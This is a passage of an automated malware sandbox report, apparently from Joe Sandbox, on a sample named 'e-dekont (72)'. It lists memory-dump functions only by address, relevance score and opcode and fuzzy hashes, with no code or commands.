                                                                • Instruction ID: f3ffe77b729f534aabffde3d6fd3bf622d0f2b6050be601453626d0698a1a04f
                                                                • Opcode Fuzzy Hash: 229d0fed243a138efe82b51955a5e9b144e1b27c8afbfb4e6e74cdac4f6a0318
                                                                • Instruction Fuzzy Hash: 67D0A774D84024CFDB05AF15E45439C7354FB10705F419C35C9025B119CB30DC599AC6
                                                                Function 06AEAC4F Relevance: .0, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1baa28c8bbe8522e5a0dd956fd89b3bc05cf7d01414ffc1da89b6b9ce059d9a0
                                                                • Instruction ID: 424192f0d264a0d59bc5e3b2a7682ee1460d6315a6e5d8a18c4aa375ef786e73
                                                                • Opcode Fuzzy Hash: 1baa28c8bbe8522e5a0dd956fd89b3bc05cf7d01414ffc1da89b6b9ce059d9a0
                                                                • Instruction Fuzzy Hash: D5D05EF44012188FDB50AF24EC4474E3BF8AB42306F1093A480089B316C73559458F90
                                                                Function 06AD4919 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c5563cb99f0083285bda919c78c93fdea8a78580dce58580a75a2437315fa9a
                                                                • Instruction ID: e3e6655c748b48c52eecf692a625dbba229a4229d8a4f1c9809a5decc71ca74a
                                                                • Opcode Fuzzy Hash: 4c5563cb99f0083285bda919c78c93fdea8a78580dce58580a75a2437315fa9a
                                                                • Instruction Fuzzy Hash: E8C08C32040108BB8B184E68E800CF67B9EDB856127008028BA0502112DA23A96697E0
                                                                Function 02E17A16 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2c7f8bbf08685ce7934018b3e8b934b570154d9b5a8b535618ec82e1c95e9bf5
                                                                • Instruction ID: cc7df32f694eed3211eaf78d67fb9165461c7fa74b9223e235f3943fcae04757
                                                                • Opcode Fuzzy Hash: 2c7f8bbf08685ce7934018b3e8b934b570154d9b5a8b535618ec82e1c95e9bf5
                                                                • Instruction Fuzzy Hash: 25C012324A02108FD7A4ABA8FC5A3A87BE0AB0171AF008129E419641A7CBB10500CB16
                                                                Function 06FAE738 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2053042203.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6f90000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 328ebcfc4d6d4929e67486fb098f7abdeae6007c004b4f21152ab611c472d7a1
                                                                • Instruction ID: db49158977800d62d86f6cc39232e1808d6c9922841560091c0c7240db94d3be
                                                                • Opcode Fuzzy Hash: 328ebcfc4d6d4929e67486fb098f7abdeae6007c004b4f21152ab611c472d7a1
                                                                • Instruction Fuzzy Hash: 67C02B7105B3048FF3511644A40D37172EC830B316F485804521D00163C6714424D360
                                                                Function 06C378B0 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f38e6e14756059030b93ebc3c1a5aa59e36b527810eb62fc6d6794ba2ea87da
                                                                • Instruction ID: a795294e907a4ae71fb190a46f444e88e4fb43bdb5106897642b1a0af10ce855
                                                                • Opcode Fuzzy Hash: 4f38e6e14756059030b93ebc3c1a5aa59e36b527810eb62fc6d6794ba2ea87da
                                                                • Instruction Fuzzy Hash: 46C0123001A7416FC7034B906C159C27F6A5E812053098182E55489073C7244425F731
                                                                Function 06C349B0 Relevance: .0, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fe2363ebcea9ff6657cecb22cebf7be09f2eb46c6b0edaa7978a2aa5e3f1cb12
                                                                • Instruction ID: 1feab02187df686b888f0a7231dd8a54b5bc152188bfafeade992e670939c0d8
                                                                • Opcode Fuzzy Hash: fe2363ebcea9ff6657cecb22cebf7be09f2eb46c6b0edaa7978a2aa5e3f1cb12
                                                                • Instruction Fuzzy Hash: 94C04C0402F3D41ACB5781341C605C31FAB4D8730DBEF91CA949089963C148452B5779
                                                                Function 06AD5BC9 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 640e0dd0a0c6169910ee53e072e422cf064ece7d4eac116d37d61b8bbb724923
                                                                • Instruction ID: e75333d2009041015117db1f97711a325b727067bda205bca0657b1e0b3ff765
                                                                • Opcode Fuzzy Hash: 640e0dd0a0c6169910ee53e072e422cf064ece7d4eac116d37d61b8bbb724923
                                                                • Instruction Fuzzy Hash: 77C080724481049FCB044E50B405E4B7FE0DB60311F034417F785401404A311120DE34
                                                                Function 02E17A18 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81b88797650ca7bb84cae6c5998aee19b5749e3537836e408754e04ed4377625
                                                                • Instruction ID: a6be69e1cf79875468ed6dd042074345493434ae647bea20fafed67f7f7fcf75
                                                                • Opcode Fuzzy Hash: 81b88797650ca7bb84cae6c5998aee19b5749e3537836e408754e04ed4377625
                                                                • Instruction Fuzzy Hash: D6C08C320512048FD3A03BE4FC0E32877E86B00A0AF404020E11C141B7CBB04510C72A
                                                                Function 02E108A0 Relevance: .0, Instructions: 11COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aab762132f01e3ba29fd114675d76d6b36a0f481ebf0116ab98e6a1028d3af05
                                                                • Instruction ID: 1c8b05381361c918bfa94d362c1c3eaeca881c553de40acf55597f7c697507c0
                                                                • Opcode Fuzzy Hash: aab762132f01e3ba29fd114675d76d6b36a0f481ebf0116ab98e6a1028d3af05
                                                                • Instruction Fuzzy Hash: 9BC08C6294E3C08ED71322305C304CA3FA08CE2018BAF40D780C489933E428880982C2
                                                                Function 06AD2745 Relevance: .0, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db0a2a74787abf281387abc78459c38fe47543c6bc55be623b69d8ce15622d9b
                                                                • Instruction ID: a7392283993b0a53205c4a1905df3aa66900cbdf441e87d442a31f02ee95f91a
                                                                • Opcode Fuzzy Hash: db0a2a74787abf281387abc78459c38fe47543c6bc55be623b69d8ce15622d9b
                                                                • Instruction Fuzzy Hash: BBC04C75140208EFC700DF55D444C45BFB8FF197617518495F9844B631C772E850DE54
                                                                Function 06AE8E86 Relevance: .0, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e9aa465186cc52d93af44e854b708250828b2d937db26dab6293ec6dab55b112
                                                                • Instruction ID: 5bc84aa104614bc0f6e44f9008f616a7e9a16873413634e8b7e03b6528651ef0
                                                                • Opcode Fuzzy Hash: e9aa465186cc52d93af44e854b708250828b2d937db26dab6293ec6dab55b112
                                                                • Instruction Fuzzy Hash: 7AC04C76E1011E9BCF14DBD9E4419DCF7B4EF94322F008036D214A7104D6315526CF50
                                                                Function 06AD563D Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1a26dec08324d7e4d8228f3a6b39ef37e2deb9503aefee022597c6907c546a0
                                                                • Instruction ID: d79a1611650f19d0dfb8304732264a19018b6709a18528e5c9b5578911d5b132
                                                                • Opcode Fuzzy Hash: c1a26dec08324d7e4d8228f3a6b39ef37e2deb9503aefee022597c6907c546a0
                                                                • Instruction Fuzzy Hash: 15C04839200000EBC244CF44C994C16FBA6EFA9318B28C89DAA894B352CB33EC13EB50
                                                                Function 06AD2748 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                                                                • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                                                                Function 06AD0830 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                Function 06C30A1A Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8d30db4f6a85bc51a2f0d5ec9b6a6dbe96510df4c25c18232622fbed23161bd
                                                                • Instruction ID: 75c5e50de7c009b738ab6968e812755582188db6237184c9d9ed573e35eb98b9
                                                                • Opcode Fuzzy Hash: e8d30db4f6a85bc51a2f0d5ec9b6a6dbe96510df4c25c18232622fbed23161bd
                                                                • Instruction Fuzzy Hash: 6EC04C742041489FE7147F71D17866D3662F766709F50001A620667298CF744844DB62
                                                                Function 06AD4920 Relevance: .0, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0d6f258cc3cfea9922d81b634386b33f027a868d0b0abb4df1c689a3887a065
                                                                • Instruction ID: 3098677d08773e83d10b7b0500db930b4f4a54535ba02e0c0f28100b14e2765d
                                                                • Opcode Fuzzy Hash: e0d6f258cc3cfea9922d81b634386b33f027a868d0b0abb4df1c689a3887a065
                                                                • Instruction Fuzzy Hash: 4BB09232000208AB8B109B84E904895BBAAAB986117008029B609062228B33A962DB94
                                                                Function 02E10890 Relevance: .0, Instructions: 5COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10d2dc204a0cb36d76e184791e340acf20dbeee16b58499de6ac27c7d590173b
                                                                • Instruction ID: 1e3818b0a97c6feb003c90e6366909927a4564d272ffe440e7270f700b0abb6f
                                                                • Opcode Fuzzy Hash: 10d2dc204a0cb36d76e184791e340acf20dbeee16b58499de6ac27c7d590173b
                                                                • Instruction Fuzzy Hash: 8190223000020C8B000023A03008008338CC200000F800000A80C0000A0E0020200280
                                                                Function 02E11D10 Relevance: .0, Instructions: 2COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d54dffa2748c59f65aac6febeb1bd9efd2ca59dab00dfa14395f8637cbaa5d07
                                                                • Instruction ID: aa25f06dac6a712653e9a049eb16691b0115a4253bf8ddee2c05b6a82b87aedf
                                                                • Opcode Fuzzy Hash: d54dffa2748c59f65aac6febeb1bd9efd2ca59dab00dfa14395f8637cbaa5d07
                                                                • Instruction Fuzzy Hash:

                                                                Non-executed Functions

                                                                Function 06C37428 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (nq$,nq
                                                                • API String ID: 0-719044535
                                                                • Opcode ID: 2c548a8c6c0a5120cfc9314a71b82b933fb42f137ac4909359431df6d79f6124
                                                                • Instruction ID: 3824db1c612aec760f794924c050540e2c625928d94c754e2519b75473449731
                                                                • Opcode Fuzzy Hash: 2c548a8c6c0a5120cfc9314a71b82b933fb42f137ac4909359431df6d79f6124
                                                                • Instruction Fuzzy Hash: D8D12A74A00215CFDB55DF69C584AADBBF2FF89310F2584A9E405AB365CB30ED81CBA4
                                                                Function 02E13E18 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 37cc50c54be860bbcbe6892098acd8578842b3ba0d88d65b87331e2bcae4fc91
                                                                • Instruction ID: e69874c3242d6280883c6236312fff98c702a631e3a74992e33ba0ec4ff68f94
                                                                • Opcode Fuzzy Hash: 37cc50c54be860bbcbe6892098acd8578842b3ba0d88d65b87331e2bcae4fc91
                                                                • Instruction Fuzzy Hash: 5D71FBB5E012098FDB08EF6AE56069EBBF2BF99304F14C139D0059B2B9EB745905CB91
                                                                Function 02E13E28 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq
                                                                • API String ID: 0-1204115232
                                                                • Opcode ID: 1f59086305a3c90318cb48364ad7d0a2f195db0e60d73d8f11dd5dc9cac667fa
                                                                • Instruction ID: cc49874a834805b52f714398ad73b51019b1a574aa4336d4c91599f951c36e6a
                                                                • Opcode Fuzzy Hash: 1f59086305a3c90318cb48364ad7d0a2f195db0e60d73d8f11dd5dc9cac667fa
                                                                • Instruction Fuzzy Hash: 7E71ECB4E012098FDB08EF6AE56069ABBF6BFD9304F14C139D0049B2BDEB745945CB91
                                                                Function 06AE79C0 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Vv}
                                                                • API String ID: 0-575040017
                                                                • Opcode ID: 670edc4397a73629c7be94657758354948241e10b069b7d79ddb397894ec7c68
                                                                • Instruction ID: 3b0cc1f6fa323914668f06daa99ef9ec66c260f15bfcf2682cad0093181bcd98
                                                                • Opcode Fuzzy Hash: 670edc4397a73629c7be94657758354948241e10b069b7d79ddb397894ec7c68
                                                                • Instruction Fuzzy Hash: 1A12A271E006198FDB54DFAAC98069EFBF2FF88304F24C569D419AB21AD734A946CF50
                                                                Function 05998008 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0&,
                                                                • API String ID: 0-1722624584
                                                                • Opcode ID: ba345d3dcbd59abab0e6d4f11b2123782fd13975c0e47f21987d2265e1763ca4
                                                                • Instruction ID: 2ead923acfa95797106d90db49e9929a27320b7cb9ef1cc7f457cc9db1ec5bf3
                                                                • Opcode Fuzzy Hash: ba345d3dcbd59abab0e6d4f11b2123782fd13975c0e47f21987d2265e1763ca4
                                                                • Instruction Fuzzy Hash: C5C135B4A05218CFDB58EFA9D598BEDB7F2FB5A300F10816AD109A7394CB349885CF01
                                                                Function 06C329C9 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 68d25edf9a7ca298e9ad22deb5f6149c3ccdb6a09f4bf74c7d18ca665b71e4c7
                                                                • Instruction ID: b11e85e50db2788cdd9c7ac197bee694f734c8a2762f92c4511db40d16f12dcd
                                                                • Opcode Fuzzy Hash: 68d25edf9a7ca298e9ad22deb5f6149c3ccdb6a09f4bf74c7d18ca665b71e4c7
                                                                • Instruction Fuzzy Hash: 77C1F574E00268CFEB64DFA9D884B9DBBF2FB89300F1480A9D508A7355DB785A85CF50
                                                                Function 06C88A08 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c&A
                                                                • API String ID: 0-2748024365
                                                                • Opcode ID: 8b47ec56fcba7c537b4879aec3869506db4f5f536a7d1df211fcbee1e5f6d077
                                                                • Instruction ID: 4584b9b1a1bbf252fd8b5438d9c034bd1da81d92d351ff3810f613e0c0655325
                                                                • Opcode Fuzzy Hash: 8b47ec56fcba7c537b4879aec3869506db4f5f536a7d1df211fcbee1e5f6d077
                                                                • Instruction Fuzzy Hash: A9C128B4D02218CFEBA4EFA5C954BADBBF2BF49304F5080AAD409A7795CB345985CF50
                                                                Function 06C329D8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 3a8b354c6f7fb456d01fbe678db31518f970e0395e49506567b0b355bb83d212
                                                                • Instruction ID: e6e56590ebb9bfcf5aa072e377d98d23b94db579c15e301c10c3d37d34f03a59
                                                                • Opcode Fuzzy Hash: 3a8b354c6f7fb456d01fbe678db31518f970e0395e49506567b0b355bb83d212
                                                                • Instruction Fuzzy Hash: 2FB1D574E00228CFEB64DFAAD894B9DB7F2FB49300F1090A9D509E7255DB785A85CF50
                                                                Function 05998679 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^lfG
                                                                • API String ID: 0-2420411867
                                                                • Opcode ID: e41b7bf49742708434f1b1f4cc3662b196565e96420879c5e5e7643deb496476
                                                                • Instruction ID: 2513e18eb392848479d52231506aabff70d96a201d95d42c51f5fcf7ddac5da4
                                                                • Opcode Fuzzy Hash: e41b7bf49742708434f1b1f4cc3662b196565e96420879c5e5e7643deb496476
                                                                • Instruction Fuzzy Hash: EFA13BB8A04208CFDB48DFA9D468BAEBBF6FB9A310F548129D105EB394DB345845CF51
                                                                Function 05998688 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^lfG
                                                                • API String ID: 0-2420411867
                                                                • Opcode ID: e67a32f28407d3a5d22bc7b40eb1fad9f284d7ff562238f6be6150a1a32a9034
                                                                • Instruction ID: 27b04b199ed113c4bdf38cf8bf6db7aada32140ebce21b70dac44fab98718ca7
                                                                • Opcode Fuzzy Hash: e67a32f28407d3a5d22bc7b40eb1fad9f284d7ff562238f6be6150a1a32a9034
                                                                • Instruction Fuzzy Hash: DD912AB8A04208CFDB48DFA9D458BAEBBF6FB9A310F548129D109EB394DB345845CF51
                                                                Function 06AE1EB0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6
                                                                • API String ID: 0-498629140
                                                                • Opcode ID: a51ec9a166d2a1e9ef0d89f6231543c53c4abb38f94c67877653529ca9f97d52
                                                                • Instruction ID: 1702f3474f63a386721f89d20ae1cfc12cecf8a9f523d47093abf12b32605387
                                                                • Opcode Fuzzy Hash: a51ec9a166d2a1e9ef0d89f6231543c53c4abb38f94c67877653529ca9f97d52
                                                                • Instruction Fuzzy Hash: DB51A875D016288FEB58DFA6C9486DEBBF7BF89300F14C1AAD409AB254DB740A85CF50
                                                                Function 06AEC07F Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052204310.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ae0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Vv}
                                                                • API String ID: 0-575040017
                                                                • Opcode ID: c8e151f8cec05b2fe10031741671c7d04d55eacecbeb55d1dba0554182610650
                                                                • Instruction ID: cc5967f0bcda3680062eab2f8557f1f377132f457b4058a4c5f8fbcb3f90186e
                                                                • Opcode Fuzzy Hash: c8e151f8cec05b2fe10031741671c7d04d55eacecbeb55d1dba0554182610650
                                                                • Instruction Fuzzy Hash: 0A613BB4E04228CFEB64DF69C884B8DB7F1BB49304F5181E9D598E7205E730AA95CF25
                                                                Function 06AD9F88 Relevance: .2, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052132724.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6ad0000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4255fa935d96b5978cbab59aee74a2121d8f9e6d5d2487056ca196befe3d2262
                                                                • Instruction ID: b2ef962129bce7f64f73135758a4f711d94040fd5ae348d5502cd400240272c3
                                                                • Opcode Fuzzy Hash: 4255fa935d96b5978cbab59aee74a2121d8f9e6d5d2487056ca196befe3d2262
                                                                • Instruction Fuzzy Hash: F9A107B8E04208CFDB44EFA9D558BADB7F6FB9A300F508129D50AAB394DB349845CF51
                                                                Function 06AD9F83 Relevance: .2, Instructions: 235COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
